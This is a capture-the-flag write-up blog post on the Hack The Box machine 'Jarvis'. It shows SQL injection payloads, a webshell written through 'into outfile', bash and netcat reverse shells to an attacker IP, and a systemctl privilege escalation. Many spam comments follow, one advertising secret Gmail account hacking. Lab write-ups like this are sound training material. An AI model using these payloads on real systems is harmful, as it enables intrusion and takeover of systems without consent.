OSCP PREPROTİONS – HTB Jarvis

Jarvis machine is a vulnerable machine with Linux operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of the network scan, we have detected many ports, let’s enumerate through the popular port 80.

22/tcp OpenSSH 7.4p1, 80/tcp http Apache httpd, and 64999/tcp ports were found to be open.
Go buster scan

Web enumeration

Source code analysis

We provided web enmueration in the source code and we did not get any results in the wepanalyzer section.
We ran a scan with gobuster to detect hidden files and directories.

There is no related attractive directory other than the phpadmin directory, we note it for now and continue.
We check the input field and url fields on the web.
We encounter /room.php again, which we detected in Gobuster, where the url part is in a remarkable get request. And it returns an answer with cod=.

Here we tried code injection in the input field, we were not successful. When we did the Sql injection, we did not bring anything different again, we did not bring only images and descriptions, that is, an empty response came

Here we will return true flase value to understand that there is sql injection.
That is;
false
http://10.10.10.143/room.php?cod=1 and 1=2 — – –

true

http://10.10.10.143/room.php?cod=1 and 1=1 — –

As we can see, the response came to us successfully at true value
Here, let’s see how to extract information after making sure of sql injection.
We use ORDER BY sytanx to find the number of columns. Here, we realized that there are 7 columns since there are up to 7 columns.
http://10.10.10.143/room.php?cod=1 order by 8
Now we can use union based queries to find injectable columns.
http://10.10.10.143/room.php?cod=-1 union select 1,2,3,4,4,5,6,7

Let’s check the database version and the user we are running.
http://10.10.10.143/room.php?cod=-1 union select 1,database(),user(),4,5,6,7

The server is MariaDB and is running using DBadmin.
Let’s see if we can read a file using the load_file() function.
http://10.10.10.143/room.php?cod=-1 union select 1,load_file(‘/etc/passwd’),3,4,5,6,7

We were able to read it, now let’s try to write webshell
http://10.10.10.143/room.php?cod=-1 union select 1,”,3,4,5,6,7 into outfile ‘/var/www/html/pwned.php’

After installing this command, we can run our commands with exec parameters using curl.
curl -X POST http://10.10.10.143/pwned.php –data-urlencode exec=whoami

Super now here we are writing our command that will give revershell and we are listening before sending it.
curl -X POST http://10.10.10.143/pwned.php –data-urlencode ‘exec=bash -c “bash -i >& /dev/tcp/10.10.14.19/4747 0>&1″‘

We got our Shell

We have seen that our authorizations are very limited here. Therefore we provide local enumeration.

We found that /var/www/Admin-Utilities/simpler.py scrpiti is a script file that can be run with root privileges. We analyzed this file.
Looking at scrpiti, we see that it takes an IP address using the -p argument and then uses os.system() to execute the ping. Several characters (& ; – ` |) are blocked by the script to prevent injection. However the characters ‘$’, ‘(‘ and ‘)’ are not blocked. This will allow us to inject commands via bash command replacement, i.e. “$(cmd)”. Let’s check if it works using the script.

Here we tried something that we can njection outside the ip
By typing the command $(whoami) here the pepper user is provided with feedback

Let’s take action here that will give us a shell

We got our shell here.
We got our user flag but we did not have root authorization.
To detect non-default SUID files here find / -perm -4000 2>/dev/null
We used the command.

We encountered /bin/systemctl. The /bin/systemctl file is used to manage services. Let’s see if there is an impact upgrade related to systemctl via gtfobins.

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF

We’ve flattened your commune. It’s like this.

echo '[Service]
Type=notify
ExecStart=/bin/sh -c "nc -e /bin/bash 10.10.14.19 4700"
KillMode=process
Restart=on-faillure
RestartSec=42s
[Install]
WantedBy=multi-user.target'  > new.service

sudo systemctl link /home/pepper/new.service

sudo systemctl start new

So we asked it to give us revershell and then it gave us revershell by running systemctl and we lede root privileges.

Comments

  1. Kia

    Hey! Would you mind if I share your blog with my myspace group?
    There’s a lot of folks that I think would really appreciate your content.
    Please let me know. Many thanks

  2. Tong

    Woah! I’m really enjoying the template/theme of this site.
    It’s simple, yet effective. A lot of times it’s hard to get
    that “perfect balance” between user friendliness and visual appeal.
    I must say that you’ve done a excellent job with this.
    Additionally, the blog loads super quick for me on Internet explorer.
    Excellent Blog!

  3. Jacobie

    Hello very cool site!! Guy .. Beautiful .. Wonderful .. I will bookmark your blog
    and take the feeds additionally? I’m happy to find a lot of
    useful info here within the post, we want work out more strategies on this
    regard, thanks for sharing. . . . . .

  4. Kha

    Howdy! This is my 1st comment here so I just wanted to give
    a quick shout out and tell you I really enjoy reading through your articles.
    Can you recommend any other blogs/websites/forums that go over the same topics?
    Thank you so much!

  5. Gamal

    Hmm it appears like your blog ate my first comment (it was extremely long) so I guess
    I’ll just sum it up what I had written and say, I’m thoroughly
    enjoying your blog. I as well am an aspiring blog writer but I’m still new to everything.

    Do you have any tips and hints for novice blog writers?
    I’d really appreciate it.

  6. Cristofer

    I blog frequently and I seriously thank you for your
    information. The article has really peaked my interest.
    I’m going to take a note of your site and keep checking for new information about once a week.
    I subscribed to your RSS feed as well.

  7. Jeris

    My brother suggested I might like this blog. He was entirely
    right. This post truly made my day. You cann’t imagine just how much time I had spent for this info!
    Thanks!

  8. Tanja

    I was wondering if you ever considered changing the structure of your website?
    Its very well written; I love what youve got to say.
    But maybe you could a little more in the way of
    content so people could connect with it better.
    Youve got an awful lot of text for only having 1
    or 2 images. Maybe you could space it out better?

  9. Patra

    Undeniably consider that that you said. Your favorite justification appeared to be at the web the easiest factor to take into accout of.
    I say to you, I definitely get irked even as folks consider issues that they plainly do not recognise about.

    You controlled to hit the nail upon the highest as smartly as defined out the
    entire thing with no need side effect , other folks could
    take a signal. Will likely be back to get more.
    Thank you

  10. Ellana

    What i don’t realize is actually how you are no longer actually much more smartly-appreciated than you may be now.

    You are so intelligent. You know therefore considerably in terms of this subject, produced me for
    my part imagine it from so many numerous angles.
    Its like women and men don’t seem to be involved except it’s something to accomplish with Lady gaga!
    Your personal stuffs nice. Always deal with it up!

  11. Aurea

    Hello there! I simply wish to offer you a huge thumbs up for your great
    information you have here on this post. I’ll be coming back to your website for more soon.

  12. Demaris

    The other day, while I was at work, my sister stole my apple
    ipad and tested to see if it can survive a 30 foot drop, just so she can be a
    youtube sensation. My iPad is now destroyed and she
    has 83 views. I know this is completely off topic but I had to share it with someone!

  13. Shardea

    Hello there! This is kind of off topic but I need some advice from an established blog.
    Is it hard to set up your own blog? I’m not very techincal but I can figure things out
    pretty quick. I’m thinking about creating my own but I’m
    not sure where to begin. Do you have any tips or suggestions?
    Appreciate it

  14. Gabrella

    I do not even know how I ended up here, but I thought this
    post was great. I do not know who you are but definitely you are going to a famous blogger if
    you aren’t already 😉 Cheers!

  15. Lucien

    fantastic issues altogether, you simply received a logo new
    reader. What might you recommend in regards to your post that you just made some days ago?

    Any sure?

  16. Danaya

    Woah! I’m really enjoying the template/theme of this website.
    It’s simple, yet effective. A lot of times it’s tough to get that “perfect balance”
    between usability and appearance. I must say you’ve done a
    amazing job with this. Also, the blog loads super quick for me on Internet explorer.
    Outstanding Blog!

  17. Lenea

    Greetings from Ohio! I’m bored at work so I decided to check out your site on my iphone during lunch break.
    I really like the knowledge you present here and can’t wait
    to take a look when I get home. I’m shocked at how fast your
    blog loaded on my cell phone .. I’m not even using WIFI, just 3G ..

    Anyways, good site!

  18. Lizzette

    Sweet blog! I found it while browsing on Yahoo News.

    Do you have any tips on how to get listed in Yahoo News?
    I’ve been trying for a while but I never seem to get there!
    Thank you

  19. Cornell

    I got this site from my pal who informed me regarding this web site and at the
    moment this time I am browsing this web site
    and reading very informative articles at this time.

  20. Pearlie

    Hey I know this is off topic but I was wondering if you knew of
    any widgets I could add to my blog that automatically tweet my
    newest twitter updates. I’ve been looking for a plug-in like this for quite some time
    and was hoping maybe you would have some experience with
    something like this. Please let me know if you run into anything.
    I truly enjoy reading your blog and I look forward to your new
    updates.

  21. Takeena

    My brother recommended I might like this web site.

    He was entirely right. This post truly made my day.
    You cann’t imagine just how much time I had spent for this info!
    Thanks!

  22. e-commerce

    Wow, awesome weblog format! How lengthy have you ever been blogging for?
    you make blogging glance easy. The full glance of your website is magnificent, let
    alone the content! You can see similar here sklep

  23. e-commerce

    Having read this I believed it was rather informative.
    I appreciate you spending some time and energy to put this
    short article together. I once again find myself personally spending a lot of time both reading and commenting.
    But so what, it was still worth it! I saw similar here: Najlepszy sklep

  24. sklep

    Good day! Do you know if they make any plugins to assist with Search Engine Optimization? I’m trying to get my blog to
    rank for some targeted keywords but I’m not seeing very good results.
    If you know of any please share. Kudos! You can read similar article here: Dobry sklep

  25. Szpiegowskie Telefonu

    Czytanie wiadomości e-mail innych osób na komputerze bez znajomości hasła jest bardzo trudne. Ale mimo że Gmail ma wysokie zabezpieczenia, ludzie wiedzą, jak potajemnie włamać się do konta Gmail. Udostępnimy kilka artykułów na temat łamania Gmaila, tajnego hakowania dowolnego konta Gmail, nie znając ani słowa.

  26. Auto Approve List

    Good day! Do you know if they make any plugins to assist
    with Search Engine Optimization? I’m trying to get my
    site to rank for some targeted keywords but I’m not seeing very good results.
    If you know of any please share. Kudos! You can read similar text here:
    Scrapebox AA List

  27. tlover tonet

    Excellent post. I was checking constantly this blog and I’m impressed! Very useful information particularly the last part 🙂 I care for such information much. I was seeking this certain info for a very long time. Thank you and best of luck.

  28. tlover tonet

    I cherished up to you will obtain carried out proper here. The cartoon is attractive, your authored subject matter stylish. nonetheless, you command get got an nervousness over that you would like be handing over the following. unwell undoubtedly come further until now again as exactly the similar just about a lot incessantly within case you defend this hike.

  29. Puravive

    A formidable share, I simply given this onto a colleague who was doing slightly analysis on this. And he in fact purchased me breakfast as a result of I found it for him.. smile. So let me reword that: Thnx for the treat! But yeah Thnkx for spending the time to debate this, I really feel strongly about it and love studying extra on this topic. If potential, as you turn out to be experience, would you mind updating your blog with more particulars? It is highly useful for me. Big thumb up for this blog submit!

  30. Java Burn

    Thanks for another fantastic post. Where else could anybody get that kind of information in such a perfect way of writing? I have a presentation next week, and I’m on the look for such information.

  31. Sight Care

    I loved up to you will receive carried out right here. The comic strip is attractive, your authored material stylish. nevertheless, you command get bought an shakiness over that you wish be delivering the following. unwell without a doubt come further earlier once more as exactly the similar nearly a lot ceaselessly within case you protect this hike.

  32. site:uweed.ch

    I am not certain where you’re getting your information, but great topic. I must spend a while studying much more or understanding more. Thanks for wonderful info I was in search of this info for my mission.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir